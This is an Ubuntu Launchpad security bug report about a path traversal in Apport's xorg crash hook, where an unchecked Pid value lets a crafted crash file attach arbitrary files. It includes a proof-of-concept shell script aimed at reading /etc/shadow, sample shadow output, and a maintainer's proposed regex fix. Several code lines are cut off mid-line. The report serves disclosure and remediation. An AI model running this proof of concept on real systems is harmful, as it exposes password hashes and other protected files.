Path traversal leads to arbitrary file read
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
Apport |
Fix Released
|
Critical
|
Unassigned | ||
apport (Ubuntu) |
Fix Released
|
Undecided
|
Unassigned | ||
openjdk-13 (Ubuntu) |
Won't Fix
|
Undecided
|
Unassigned | ||
openjdk-14 (Ubuntu) |
Won't Fix
|
Undecided
|
Unassigned | ||
openjdk-15 (Ubuntu) |
Won't Fix
|
Undecided
|
Unassigned | ||
openjdk-16 (Ubuntu) |
Won't Fix
|
Undecided
|
Unassigned | ||
openjdk-17 (Ubuntu) |
Won't Fix
|
Undecided
|
Unassigned | ||
openjdk-18 (Ubuntu) |
Won't Fix
|
Undecided
|
Unassigned | ||
openjdk-8 (Ubuntu) |
Won't Fix
|
Undecided
|
Unassigned | ||
xorg (Ubuntu) |
Won't Fix
|
Undecided
|
Unassigned |
Bug Description
While reiterating the issues reported in https:/
The following excerpt of the file `package-
if True or report.
compiz_pid = 0
pid_line = re.search(
if pid_line:
compiz_pid = pid_line.
compiz_
attach_
While in [0] the `pid_line` is extracted, this value (if successfully matched) is appended to the file path resulting in `compiz_state_file` [1], which is subsequently attached to the crash file.
Using a `Pid` such as `JRN/..
The following POC (tested on 20.04/21.04 Desktop) exploits this issue to read the file `/etc/shadow`:
mkdir /tmp/compiz_
ProblemType: Crash
ExecutablePath: /poc
Package: source_xorg 123
SourcePackage: compiz
ProcStatus:
Pid:$pid
Uid:$pid
EOF
When reading the crash file (after `whoopsie-
grep -A3 compiz_internal /var/crash/
compiz_
root:!
daemon:
bin:*:
Please credit Stephen Röttger (@_tsuro) in a potential CVE/USN.
Best regards,
Maik
Related branches
information type: | Private Security → Public Security |
tags: | added: patch |
Changed in openjdk-13 (Ubuntu): | |
status: | New → Won't Fix |
Changed in openjdk-14 (Ubuntu): | |
status: | New → Won't Fix |
Changed in openjdk-15 (Ubuntu): | |
status: | New → Won't Fix |
Changed in openjdk-16 (Ubuntu): | |
status: | New → Won't Fix |
Changed in openjdk-17 (Ubuntu): | |
status: | New → Won't Fix |
Changed in openjdk-18 (Ubuntu): | |
status: | New → Won't Fix |
Changed in openjdk-8 (Ubuntu): | |
status: | New → Won't Fix |
Changed in xorg (Ubuntu): | |
status: | New → Won't Fix |
Changed in apport: | |
importance: | Undecided → Critical |
milestone: | none → 2.21.0 |
status: | New → Fix Released |
Thanks for reporting this issue - this file comes from the xserver-xorg source package so I am adding that as an affected package - I also see there is a similar pattern in apport/ui.py itself, plus the openjdk source packages all have similar logic there too and would likely be affected as well.
In this case it could easily be handled by changing these scripts to be more strict when parsing out the Pid, as follows::
pid_line = re.search( "Pid:\t( [0-9]+) \n", report[ "ProcStatus" ])
I'll look at constructing patches based on this approach.